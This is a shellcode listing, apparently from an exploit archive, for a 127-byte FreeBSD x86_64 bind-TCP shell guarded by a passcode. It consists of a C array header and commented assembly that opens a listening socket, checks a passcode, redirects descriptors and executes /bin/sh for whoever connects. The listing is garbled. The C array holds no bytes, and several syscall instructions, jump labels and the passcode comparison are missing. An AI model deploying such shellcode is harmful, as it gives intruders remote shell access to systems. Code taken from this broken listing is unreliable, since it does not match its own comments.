* Gitsnik, @dracyrys
* FreeBSD x86_64 bind_tcp with passcode, 127 bytes
* Passcode: R2CBw0cr
C Source:
char code[] = \
Assembly Intel Source:
global _start
; Bindshell in 64 bit shellcode (written
; and tested on a FreeBSD 9.1 AMD64 OS)
; Author: Gitsnik
; Twitter: @dracyrys
; Passcode: R2CBw0cr
; 127 bytes
section .text
; int socket( 2, 1, 0 )
; socket will return a socket into rax
; 12 bytes
push byte 0x61
pop rax
push byte 0x02
pop rdi
push byte 0x01
pop rsi
cdq ; rdx is null
syscall ; socket( 2, 1, 0 )
; Swap our socket from RAX into RDI which is where
; the next few functions want it anyway
; xchg is 1 byte shorter than mov
; 2 bytes
xchg rdi, rax ; socket in rdi for bind() rax is now 2
; bind( sockfd, *addr, addrlen )
; We need to set up our serv_addr (which we know is 0,port,2)
; So load it all into RAX and push that. Note that because we want
; 7 bytes but the register is 8, we pad 0xff onto the back and then
; xor it to null to line everything up.
; 20 bytes
mov edx, 0xaaaa02ff
xor dl, 0xff
push rdx
mov rsi, rsp ; rsi points to our sockaddr *
cdq ; reset RDX
add al, 0x66 ; bind() is 0x68 but rax is already 0x02
add dl, 0x10 ; 16 (sizeof)
; listen is 0x6a
; listen( sockfd, backlog )
; bind() returns 0 on success, so add al, RDI already points at our
; sockfd, and we don't care what's in backlog but because it's a
; stack pointer from a few lines back the number is sufficiently high
; that it doesn't matter.
; 4 bytes
add al, 0x6a
; accept( sockfd, 0, 0 )
; accept() will return a new sockfd for us.
; 8 bytes
add al, 0x1e
xor rsi, rsi
; read( socket, buffer, length )
; Calls should read:
; rax: syscall number (0x03 on FreeBSD)
; rdi: client socket
; rsi: buffer address
; rdx: read size (0xf)
; We take the returned sockfd ( client ) from rax and load it into rdi
; as our second argument. We set RAX to be 0x03, as this is the syscall
; ID (reference: /usr/include/sys/syscall.h)
; Set rsi to be rsp-0xf to give us 0xf bytes of space for a buffer
; and set dl to be our length. RDX is still null because of the cdq we
; did earlier.
; When we are finished RAX will be the number of bytes read from the socket
; RDI will be our client socket
; RSI will contain the pointer to our string for passcode comparison
; RDX will be 0x000000000000000F
; 16 bytes
xchg rdi, rax
push byte 0x03 ; 0x03 is read() in FreeBSD
pop rax
push rdx ; Still null from cdq up top.
lea rsi, [rsp-0x10]
add dl, 0x10
; rsi has our string, rdi client socket
; 18 bytes
mov rax, 0x7263307742433252 ; Replace your 8 character passcode here.
push rdi ; save the socket
lea rdi, [rsi]
jz dup2setup
; Exit
; 8 bytes
xor rax, rax
inc rax
; Setup for dup2 loop
; 7 bytes
pop rdi
mov rax, rdx ; RDX is dl, 0x10 but otherwise 0x00
; so we can do this and then just correct
; in the dup2 loop.
mov rsi, rdi
; dup2 loop
; 9 bytes
dec rsi
mov al, 0x5a
jnz dup2
; Now for the big one. Let's set up our execve()
; At this point RAX is 0 so just null out rdx
; We need rdx to be null for the 3rd argument to execve()
; 23 bytes
add al, 0x3b ; execve()
mov rbx, 0x68732f2f6e69622f ; hs//nib/
; Argument one shell[0] = "/bin//sh"
push rdx ; null
push rbx ; hs//nib/
; We need pointers for execve()
push rsp ; *pointer to shell[0]
pop rdi ; Argument 1
; Argument two shell (including address of each argument in array)
push rdx ; null
push rdi ; address of shell[0]
; We need pointers for execve()
push rsp ; address of char * shell
pop rsi ; Argument 2